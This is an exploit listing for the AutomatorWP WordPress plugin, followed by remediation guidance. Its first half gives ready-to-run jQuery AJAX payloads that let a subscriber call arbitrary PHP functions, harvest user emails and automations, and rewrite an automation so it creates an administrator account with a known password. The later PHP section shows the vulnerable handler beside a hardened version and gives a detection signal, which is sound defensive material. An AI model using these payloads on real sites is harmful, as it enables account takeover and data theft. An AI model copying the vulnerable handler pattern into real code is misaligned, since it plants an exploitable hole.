## https://sploitus.com/exploit?id=WPEX-ID:5916EA42-EB33-463D-8528-2A142805C91F
Attack Procedures
1) Run this in Dashboard while logged in as Subscriber to get phpinfo (or other functions') result. Note that no arguments are passed to the function:

```javascript
jQuery.post(ajaxurl, {action: "automatorwp_get_posts", nonce: automatorwp_admin_notices.nonce, post_type_cb: "phpinfo"})
```

2) Run this to enumerate automations:

```javascript
jQuery.post(ajaxurl, {action: "automatorwp_get_objects", nonce: automatorwp_admin_notices.nonce, q: "", table: "automatorwp_automations"})
```

or, user emails:

```javascript
jQuery.post(ajaxurl, {action: "automatorwp_get_users", nonce: automatorwp_admin_notices.nonce, q: ""})
```

or, post titles:

```javascript
jQuery.post(ajaxurl, {action: "automatorwp_get_posts", nonce: automatorwp_admin_notices.nonce})
```

3) Run this to overwrite an Anonymous automation. Since an anonymous automation can be configured to create a new user with any role, including the Administrator role and a pre-defined password, this allows privilege escalation. "id" is different from the automation ID; however, it can be brute-forced easily.

```javascript
jQuery.post(ajaxurl, {
  action: "automatorwp_update_item_option",
  existing_user_not_exists: "new_user",
  first_name: "",
  id: "1", /* CHANGE THIS */
  item_type: "action",
  last_name: "",
  new_user_exists: "abort",
  new_user_search_field: "email",
  nonce: automatorwp_admin_notices.nonce,
  option_name: "user",
  role: "administrator",
  run_actions_on: "existing_user",
  search_field: "login",
  search_field_value: "automatorwp-privesc",
  user_email: "automatorwp-privesc@example.com",
  user_login: "automatorwp-privesc",
  "user_meta[0][meta_key]": "",
  "user_meta[0][meta_value]": "",
  user_pass: "escalated",
  user_url: ""
})
```

Run this, and when the automation triggers a new user is created. You can log in as "automatorwp-privesc" with password "escalated". You can also overwrite the item when the automation triggers via the "automatorwp_add_automation_item" AJAX action.
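The root cause common to all three steps is that the `wp_ajax_*` handlers accept a nonce exposed to every dashboard user as if it were an authorization check, and step 1 additionally invokes a callback name taken from the request. The following is an added example, not AutomatorWP's own code: a hypothetical handler (`example_get_posts_*`, `example_list_*`, the `example_admin_nonce` action name are all made up) showing the vulnerable pattern beside a hardened version that adds a capability check and replaces the raw callback with an allowlist. The same `current_user_can()` gate is what the item-update action in step 3 needs.

```php
<?php
// Added example (hypothetical handler, not AutomatorWP's own code).

// VULNERABLE: a logged-in-only AJAX action that calls whatever function
// name the client supplies. check_ajax_referer() only proves the request
// came from a dashboard page; it says nothing about the caller's role.
function example_get_posts_vulnerable() {
    check_ajax_referer( 'example_admin_nonce', 'nonce' );
    $cb     = isset( $_POST['post_type_cb'] ) ? $_POST['post_type_cb'] : '';
    $result = null;
    if ( is_callable( $cb ) ) {
        $result = call_user_func( $cb ); // arbitrary function execution
    }
    wp_send_json_success( $result );
}

// HARDENED: nonce check, then an explicit authorization check, then a
// fixed mapping from client-supplied keys to known callables.
function example_get_posts_hardened() {
    check_ajax_referer( 'example_admin_nonce', 'nonce' );

    // Authorization is separate from the nonce; subscribers fail here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Never pass a request string to call_user_func(); look it up instead.
    $allowed = array(
        'post' => 'example_list_posts',
        'page' => 'example_list_pages',
    );
    $key = isset( $_POST['post_type_cb'] )
        ? sanitize_key( wp_unslash( $_POST['post_type_cb'] ) )
        : '';
    if ( ! isset( $allowed[ $key ] ) ) {
        wp_send_json_error( 'unknown post type', 400 );
    }
    wp_send_json_success( call_user_func( $allowed[ $key ] ) );
}

function example_list_posts() {
    return get_posts( array( 'post_type' => 'post', 'fields' => 'ids' ) );
}
function example_list_pages() {
    return get_posts( array( 'post_type' => 'page', 'fields' => 'ids' ) );
}

// Only the hardened handler is registered; the vulnerable one is shown for contrast.
add_action( 'wp_ajax_example_get_posts', 'example_get_posts_hardened' );
```

For detection on an existing install, requests to `admin-ajax.php` carrying the `automatorwp_*` actions above from accounts without `manage_options` are the signal to alert on, since legitimate use of these endpoints comes from administrators editing automations.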